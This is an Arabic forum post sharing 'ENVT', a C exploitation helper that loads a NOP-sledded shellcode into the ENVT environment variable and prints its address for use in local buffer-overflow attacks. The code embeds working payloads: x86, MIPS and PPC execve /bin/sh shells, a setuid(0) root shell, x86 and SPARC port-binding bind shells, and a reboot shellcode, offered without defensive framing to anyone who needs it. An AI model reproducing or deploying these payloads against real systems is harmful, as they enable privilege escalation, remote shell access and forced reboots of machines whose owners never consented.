• 0
Qnix

ENVT v0.01

سؤال

قمت بكتابه هذه الاداه لتعمل على نظام linux ... تدعم pcc , sparc , mips , x86

الاداه تقوم بزرع shellcode في ال environment الخاص بالنظام وتخرج ال address الخاص به

طبعا للي يحتاجها ...

/*
* Qnix <[email protected]>
* ENVT v0.01
*
* */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define VERSION  "v0.1"
#define MAX_SIZE 1024
#define SHSIZE  512
#define bash  "/bin/bash"

/* Prototype */
void getenvaddr(char *environment);
void help(char *string);
void setshenv(int shellcode);

/****************** START OF SHELLCODES ******************/
char execve_binbash[] =
 "\x31\xc0"                    // xor    %eax, %eax
 "\x50"                        // push   %eax
 "\x68\x2f\x2f\x73\x68"        // push   $0x68732f2f
 "\x68\x2f\x62\x69\x6e"        // push   $0x6e69622f
 "\x89\xe3"                    // mov    %esp, %ebx
 "\x50"                        // push   %eax
 "\x53"                        // push   %ebx
 "\x89\xe1"                    // mov    %esp, %ecx
 "\x31\xd2"                    // xor    %edx, %edx
 "\xb0\x0b"                    // mov    $0xb, %al
 "\xcd\x80";                   // int    $0x80

char execve_setuid_setgid_bb[] =
 "\x6a\x17"  // push $0x17
 "\x58"  // pop  %eax
 "\x31\xdb"  // xor %ebx, %ebx
 "\xcd\x80"  // int $0x80

 "\x6a\x2e"  // push $0x2e
 "\x58"  // pop %eax
 "\x53"  // push %ebx
 "\xcd\x80"  // int $0x80

 "\x31\xd2"  // xor %edx, %edx
 "\x6a\x0b"  // push $0xb
 "\x58"  // pop %eax
 "\x52"  // push %edx
 "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
 "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
 "\x89\xe3"  // mov %esp, %ebx
 "\x52"  // push %edx
 "\x53"  // push %ebx
 "\x89\xe1"  // mov %esp, %ecx
 "\xcd\x80";  // int $0x80

char portbind_64713[] =
 /* socket(AF_INET, SOCK_STREAM, 0) */
 "\x6a\x66"  // push   $0x66
 "\x58"  // pop    %eax
 "\x6a\x01"  // push   $0x1
 "\x5b"  // pop    %ebx
 "\x99"  // cltd
 "\x52"  // push   %edx
 "\x53"  // push   %ebx
 "\x6a\x02"  // push   $0x2
 "\x89\xe1"  // mov    %esp,%ecx
 "\xcd\x80"  // int    $0x80

 /* bind(s, server, sizeof(server)) */
 "\x52"  // push   %edx
 "\x66\x68\xfc\xc9"  // pushw  $0xc9fc  // PORT = 64713
 "\x66\x6a\x02"  // pushw  $0x2
 "\x89\xe1"  // mov    $esp,%ecx
 "\x6a\x10"  // push   $0x10
 "\x51"  // push   %ecx
 "\x50"  // push   %eax
 "\x89\xe1"  // mov    %esp,%ecx
 "\x89\xc6"  // mov    %eax,%esi
 "\x43"  // inc    %ebx
 "\xb0\x66"  // mov    $0x66,%al
 "\xcd\x80"  // int    $0x80

 /* listen(s, anything) */
 "\xb0\x66"  // mov    $0x66,%al
 "\xd1\xe3"  // shl    %ebx
 "\xcd\x80"  // int    $0x80

 /* accept(s, 0, 0) */
 "\x52"  // push   %edx
 "\x56"  // push   %esi
 "\x89\xe1"  // mov    %esp,%ecx
 "\x43"  // inc    %ebx
 "\xb0\x66"  // mov    $0x66,%al
 "\xcd\x80"  // int    $0x80

 "\x93"  // xchg   %eax,%ebx

 /* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */
 "\x6a\x02"  // push   $0x2
 "\x59"  // pop    %ecx

 "\xb0\x3f"  // mov    $0x3f,%al
 "\xcd\x80"  // int    $0x80
 "\x49"  // dec    %ecx
 "\x79\xf9"  // jns    dup_loop

 /* execve("/bin/sh", ["/bin/sh"], NULL) */
 "\x6a\x0b"  // push   $0xb
 "\x58"  // pop    %eax
 "\x52"  // push   %edx
 "\x68\x2f\x2f\x73\x68" // push   $0x68732f2f
 "\x68\x2f\x62\x69\x6e" // push   $0x6e69622f
 "\x89\xe3"  // mov    %esp, %ebx
 "\x52"  // push   %edx
 "\x53"  // push   %ebx
 "\x89\xe1"  // mov    %esp, %ecx
 "\xcd\x80";  // int    $0x80

char reboot_20[] =
 "\x6a\x58"              // push $0x58
 "\x58"                  // pop %eax
 "\xbb\xad\xde\xe1\xfe"  // mov $0xfee1dead,%ebx
 "\xb9\x69\x19\x12\x28"  // mov $0x28121969,%ecx
 "\xba\x67\x45\x23\x01"  // mov $0x1234567,%edx
 "\xcd\x80";             // int $0x80

char sparc_portbind[]=
 "\x9d\xe3\xbf\x78" // save  %sp, -136, %sp
 "\x90\x10\x20\x02" // mov  2, %o0
 "\x92\x10\x20\x01" // mov  1, %o1
 "\x94\x22\x80\x0a" // sub  %o2, %o2, %o2
 "\xd0\x23\xa0\x44" // st  %o0, [ %sp + 0x44 ]
 "\xd2\x23\xa0\x48" // st  %o1, [ %sp + 0x48 ]
 "\xd4\x23\xa0\x4c" // st  %o2, [ %sp + 0x4c ]
 "\x90\x10\x20\x01" // mov  1, %o0
 "\x92\x03\xa0\x44" // add  %sp, 0x44, %o1
 "\x82\x10\x20\xce" // mov  0xce, %g1
 "\x91\xd0\x20\x10" // ta  0x10
 "\xd0\x27\xbf\xf4" // st  %o0, [ %fp + -12 ]
 "\x90\x10\x20\x02" // mov  2, %o0
 "\xd0\x37\xbf\xd8" // sth  %o0, [ %fp + -40 ]
 "\x13\x08\xc8\xc8" // sethi  %hi(0x23232000), %o1
 "\x90\x12\x63\x0f" // or  %o1, 0x30f, %o0
 "\xd0\x37\xbf\xda" // sth  %o0, [ %fp + -38 ]
 "\xc0\x27\xbf\xdc" // clr  [ %fp + -36 ]
 "\x92\x07\xbf\xd8" // add  %fp, -40, %o1
 "\xd0\x07\xbf\xf4" // ld  [ %fp + -12 ], %o0
 "\x94\x10\x20\x10" // mov  0x10, %o2
 "\xd0\x23\xa0\x44" // st  %o0, [ %sp + 0x44 ]
 "\xd2\x23\xa0\x48" // st  %o1, [ %sp + 0x48 ]
 "\xd4\x23\xa0\x4c" // st  %o2, [ %sp + 0x4c ]
 "\x90\x10\x20\x02" // mov  2, %o0
 "\x92\x03\xa0\x44" // add  %sp, 0x44, %o1
 "\x82\x10\x20\xce" // mov  0xce, %g1
 "\x91\xd0\x20\x10" // ta  0x10
 "\xd0\x07\xbf\xf4" // ld  [ %fp + -12 ], %o0
 "\x92\x10\x20\x05" // mov  5, %o1
 "\xd0\x23\xa0\x44" // st  %o0, [ %sp + 0x44 ]
 "\xd2\x23\xa0\x48" // st  %o1, [ %sp + 0x48 ]
 "\x90\x10\x20\x04" // mov  4, %o0
 "\x92\x03\xa0\x44" // add  %sp, 0x44, %o1
 "\x82\x10\x20\xce" // mov  0xce, %g1
 "\x91\xd0\x20\x10" // ta  0x10
 "\x92\x07\xbf\xd8" // add  %fp, -40, %o1
 "\x94\x07\xbf\xec" // add  %fp, -20, %o2
 "\xd0\x07\xbf\xf4" // ld  [ %fp + -12 ], %o0
 "\xd0\x23\xa0\x44" // st  %o0, [ %sp + 0x44 ]
 "\xd2\x23\xa0\x48" // st  %o1, [ %sp + 0x48 ]
 "\xd4\x23\xa0\x4c" // st  %o2, [ %sp + 0x4c ]
 "\x90\x10\x20\x05" // mov  5, %o0
 "\x92\x03\xa0\x44" // add  %sp, 0x44, %o1
 "\x82\x10\x20\xce" // mov  0xce, %g1
 "\x91\xd0\x20\x10" // ta  0x10
 "\xd0\x27\xbf\xf0" // st  %o0, [ %fp + -16 ]
 "\xd0\x07\xbf\xf0" // ld  [ %fp + -16 ], %o0
 "\x92\x22\x40\x09" // sub  %o1, %o1, %o1
 "\x82\x10\x20\x5a" // mov  0x5a, %g1
 "\x91\xd0\x20\x10" // ta  0x10
 "\xd0\x07\xbf\xf0" // ld  [ %fp + -16 ], %o0
 "\x92\x10\x20\x01" // mov  1, %o1
 "\x82\x10\x20\x5a" // mov  0x5a, %g1
 "\x91\xd0\x20\x10" // ta  0x10
 "\xd0\x07\xbf\xf0" // ld  [ %fp + -16 ], %o0
 "\x92\x10\x20\x02" // mov  2, %o1
 "\x82\x10\x20\x5a" // mov  0x5a, %g1
 "\x91\xd0\x20\x10" // ta  0x10
 "\x2d\x0b\xd8\x9a" // sethi  %hi(0x2f626800), %l6
 "\xac\x15\xa1\x6e" // or  %l6, 0x16e, %l6
 "\x2f\x0b\xdc\xda" // sethi  %hi(0x2f736800), %l7
 "\x90\x0b\x80\x0e" // and  %sp, %sp, %o0
 "\x92\x03\xa0\x08" // add  %sp, 8, %o1
 "\x94\x22\x80\x0a" // sub  %o2, %o2, %o2
 "\x9c\x03\xa0\x10" // add  %sp, 0x10, %sp
 "\xec\x3b\xbf\xf0" // std  %l6, [ %sp + -16 ]
 "\xd0\x23\xbf\xf8" // st  %o0, [ %sp + -8 ]
 "\xc0\x23\xbf\xfc" // clr  [ %sp + -4 ]
 "\x82\x10\x20\x3b" // mov  0x3b, %g1
 "\x91\xd0\x20\x10"; // ta  0x10

 char mips_sh[] =
 /* 56 byte execve("/bin/sh",["/bin/sh"],[]) by core */
 "\xff\xff\x10\x04\xab\x0f\x02\x24"
 "\x55\xf0\x46\x20\x66\x06\xff\x23"
 "\xc2\xf9\xec\x23\x66\x06\xbd\x23"
 "\x9a\xf9\xac\xaf\x9e\xf9\xa6\xaf"
 "\x9a\xf9\xbd\x23\x21\x20\x80\x01"
 "\x21\x28\xa0\x03\xcc\xcd\x44\x03"
 "/bin/sh";
char ppc_sh[] =
"\x7c\x3f\x0b\x78" /*mr r31,r1*/
"\x7c\xa5\x2a\x79" /*xor. r5,r5,r5*/
"\x42\x40\xff\xf9" /*bdzl+ 10000454<main>*/
"\x7f\x08\x02\xa6" /*mflr r24*/
"\x3b\x18\x01\x34" /*addi r24,r24,308*/
"\x98\xb8\xfe\xfb" /*stb r5,-261(r24)*/
"\x38\x78\xfe\xf4" /*addi r3,r24,-268*/
"\x90\x61\xff\xf8" /*stw r3,-8(r1)*/
"\x38\x81\xff\xf8" /*addi r4,r1,-8*/
"\x90\xa1\xff\xfc" /*stw r5,-4(r1)*/
"\x3b\xc0\x01\x60" /*li r30,352*/
"\x7f\xc0\x2e\x70" /*srawi r0,r30,5*/
"\x44\xde\xad\xf2" /*.long 0x44deadf2*/
"/bin/shZ"; // the last byte becomes NULL

/******************  END OF SHELLCODES  ******************/

int main(int argc, char *argv[]) {

int  c;
char buf1[MAX_SIZE];
char *addr = getenv("ENVT");
int  buf1i;
extern char *optarg;
extern int  optind, optopt;

if(addr != NULL) {
 getenvaddr(addr);
 exit(0);
}

if(argc < 2) {
 help(argv[0]);
}

while((c = getopt(argc, argv, ":s:lhv")) != -1) {
 switch(c) {
 case 'v':
   version();
   break;
 case 'h':
   help(argv[0]);
 case 'l':
   shellcode_list();
   break;
 case 's':
   strncpy(buf1,optarg,MAX_SIZE-1);
   buf1i = atoi(buf1);
   setshenv(buf1i);
   break;
 case ':':
   fprintf(stderr,"Option -%c requires an operand\n",optopt);
   break;
   
 }
}

return(0);
}

/*
* Display version .
*
* */

int version() {
fprintf(stdout,"ENVT %s\n",VERSION);
fprintf(stdout,"Coded by Qnix <[email protected]>\n");
exit(0);
}

/*
* Display help .
*
* */

void getenvaddr(char *environment) {
fprintf(stdout,"SHELLCODE FOUND IN %p\n",environment);
}

void help(char *string) {
fprintf(stderr,"Usage : %s\n-l:(shellcode-list)\n-s:<shellcode-number>\n-h:(help)\n-v:(version)\n",string);
exit(0);
}



/*
* Display shellcode list .
*
* */

int shellcode_list() {
fprintf(stdout,"\n\t\t\t::[ LINUX/x86 ]::\n");
fprintf(stdout,"1) linux/x86 execve(\"/bin/sh\", [\"/bin/sh\", NULL]) 25 bytes\n");
fprintf(stdout,"2) linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytes\n");
fprintf(stdout,"3) linux/x86 portbind (port 64713) 86 bytes\n");
fprintf(stdout,"4) linux/x86 reboot() - 20 bytes\n\n");

fprintf(stdout,"\t\t\t::[ LINUX/SPARC ]::\n");
fprintf(stdout,"5) linux/SPARC portbind port 8975 284 bytes\n\n");

fprintf(stdout,"\t\t\t::[ LINUX/MIPS  ]::\n");
fprintf(stdout,"6) linux/mips execve /bin/sh 56 bytes\n\n");

fprintf(stdout,"\t\t\t::[ LINUX/PPC  ]::\n");
fprintf(stdout,"7) linux/ppc execve /bin/sh 60 bytes\n\n");

exit(0);
}


/*
* Set Shellcode in environment .
*
* */

void setshenv(int shellcode) {
char *addr = getenv("ENVT"); // Use to get shellcode addr
char execvebb[SHSIZE];  // Use for shellcode(1)
char setugbb[SHSIZE];  // Use for shellcode(2)
char portbind[SHSIZE];  // Use for shellcode(3)
char reboot[SHSIZE];  // Use for shellcode(4)
char sparc1[SHSIZE];  // Use for shellcode(5)
char mips1[SHSIZE];  // Use for shellcode(6)
char ppc1[SHSIZE];  // Use for shellcode(7)

if(shellcode >= 8) {
 fprintf(stderr,"Error : shellcode number %d unavailable type -l to view\nthe available shellcodes.\n",shellcode);
 exit(0);
}

/* Shellcode number 1 */
if(shellcode == 1) {
 fprintf(stdout,"Shellcode: Linux/x86 execve(\"/bin/sh\", [\"/bin/sh\", NULL]) 25 bytes\n");
 fprintf(stdout,"[+]\t Setting memory for the shellcode .\n");
 memset(execvebb,0x90,SHSIZE);
 fprintf(stdout,"[+]\t Copying shellcode to memory .\n");
 memcpy(&execvebb[SHSIZE-strlen(execve_binbash)], execve_binbash, strlen(execve_binbash));
 memcpy(execvebb,"ENVT=",5);
 fprintf(stdout,"[+]\t Putting shellcode in the environment .\n");
 putenv(execvebb);
 fprintf(stdout,"[+]\t Going into the environment (ENVT) and exiting ....\nDone %d bytes loaded to (ENVT)\n",strlen(execve_binbash));
 execl(bash, bash, '\0');
 exit(0);
}

/* Shellcode number 2 */
if(shellcode == 2) {
 fprintf(stdout,"Shellcode: linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytes\n");
 fprintf(stdout,"[+]\t Setting memory for the shellcode.\n");
 memset(setugbb,0x90,SHSIZE);
 fprintf(stdout,"[+]\t Copying shellcode to memory.\n");
 memcpy(&setugbb[SHSIZE-strlen(execve_setuid_setgid_bb)], execve_setuid_setgid_bb, strlen(execve_setuid_setgid_bb));
 memcpy(setugbb,"ENVT=",5);
 fprintf(stdout,"[+]\t Putting shellcode in the environment.\n");
 putenv(setugbb);
 fprintf(stdout,"[+]\t Going into the environment (ENVT) and exiting ....\nDone %d bytes loaded to (ENVT)\n",strlen(execve_setuid_setgid_bb));
 execl(bash, bash, '\0');
 exit(0);
}

/* Shellcode number 3 */
if(shellcode == 3) {
 fprintf(stdout,"Shellcode: linux/x86 portbind (port 64713) 86 bytes\n");
 fprintf(stdout,"[+]\t Setting memory for the shellcode.\n");
 memset(portbind, 0x90, SHSIZE);
 fprintf(stdout,"[+]\t Copying shellcode to memory.\n");
 memcpy(&portbind[SHSIZE-strlen(portbind_64713)], portbind_64713, strlen(portbind_64713));
 memcpy(portbind,"ENVT=",5);
 fprintf(stdout,"[+]\t Putting shellcode in the enironment.\n");
 putenv(portbind);
 fprintf(stdout,"[+]\t Going into the environment (ENVT) and exiting ....\nDone %d bytes loaded to (ENVT)\n",strlen(portbind_64713));
 execl(bash, bash, '\0');
 exit(0);
}

/* Shellcode number 4 */
if(shellcode == 4) {
 fprintf(stdout,"Shellcode: linux/x86 reboot() - 20 bytes\n");
 fprintf(stdout,"[+]\t Setting memory for the shellcode.\n");
 memset(reboot, 0x90, SHSIZE);
 fprintf(stdout,"[+]\t Copying shellcode to memory.\n");
 memcpy(&reboot[SHSIZE-strlen(reboot_20)], reboot_20, strlen(reboot_20));
 memcpy(reboot,"ENVT=",5);
 fprintf(stdout,"[+]\t Putting shellcode in the environment.\n");
 putenv(reboot);
 fprintf(stdout,"[+]\t Going into the environment (ENVT) and exiting ....\nDone %d bytes loaded to (ENVT)\n",strlen(reboot_20));
 execl(bash, bash, '\0');
 exit(0);
}

/* Shellcode number 5 */
if(shellcode == 5) {
 fprintf(stdout,"Shellcode: linux/SPARC portbind port 8975 284 bytes\n");
 fprintf(stdout,"[+]\t Setting memory for the shellcode.\n");
 memset(sparc1, 0x90, SHSIZE);
 fprintf(stdout,"[+]\t Copying shellcode to memory.\n");
 memcpy(&sparc1[SHSIZE-strlen(sparc_portbind)], sparc_portbind, strlen(sparc_portbind));
 memcpy(sparc1, "ENVT=", 5);
 fprintf(stdout,"[+]\t Putting shellcode in the environment.\n");
 putenv(sparc1);
 fprintf(stdout,"[+]\t Going into the environment (ENVT) and exiting ....\nDone %d bytes loaded to (ENVT)\n",strlen(sparc_portbind));
 execl(bash, bash, '\0');
 exit(0);
}

/* Shellcode number 6 */
if(shellcode == 6) {
 fprintf(stdout,"Shellcode: linux/mips execve /bin/sh 56 bytes\n");
 fprintf(stdout,"[+]\t Setting memory for shellcode.\n");
 memset(mips1, 0x90, SHSIZE);
 fprintf(stdout,"[+]\t Copying shellcode to memory.\n");
 memcpy(&mips1[SHSIZE-strlen(mips_sh)], mips_sh, strlen(mips_sh));
 memcpy(mips1, "ENVT=", 5);
 fprintf(stdout,"[+]\t Putting shellcode in the environment.\n");
 putenv(mips1);
 fprintf(stdout,"[+]\t Going into the environment (ENVT) and exiting ....\nDone %d bytes loaded to (ENVT)\n",strlen(mips_sh));
 execl(bash, bash, '\0');
 exit(0);
}

/* Shellcode number 7 */
if(shellcode == 7) {
 fprintf(stdout,"Shellcode: linux/ppc execve /bin/sh 60 bytes\n");
 fprintf(stdout,"[+]\t Setting memory for shellcode.\n");
 memset(ppc1, 0x90, SHSIZE);
 fprintf(stdout,"[+]\t Copying shellcode to memory.\n");
 memcpy(&ppc1[SHSIZE-strlen(ppc_sh)], ppc_sh, strlen(ppc_sh));
 memcpy(ppc1, "ENVT=", 5);
 fprintf(stdout,"[+]\t Putting shellcode in the environment.\n");
 putenv(ppc1);
 fprintf(stdout,"[+]\t Going into the environment (ENVT) and exiting ....\nDone %d bytes loaded to (ENVT)\n",strlen(ppc_sh));
 execl(bash, bash, '\0');
 exit(0);
}

}

http://echo.sh3lls.net/~qnix/envt.c

http://rafb.net/paste/results/0Os7vg31.html

صوره :

envt.png

تم تعديل بواسطه Qnix
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

1 إجابات على هذا السؤال .

زوار
This topic is now closed to further replies.

  • يستعرض القسم حالياً   0 members

    لا يوجد أعضاء مسجلين يشاهدون هذه الصفحة .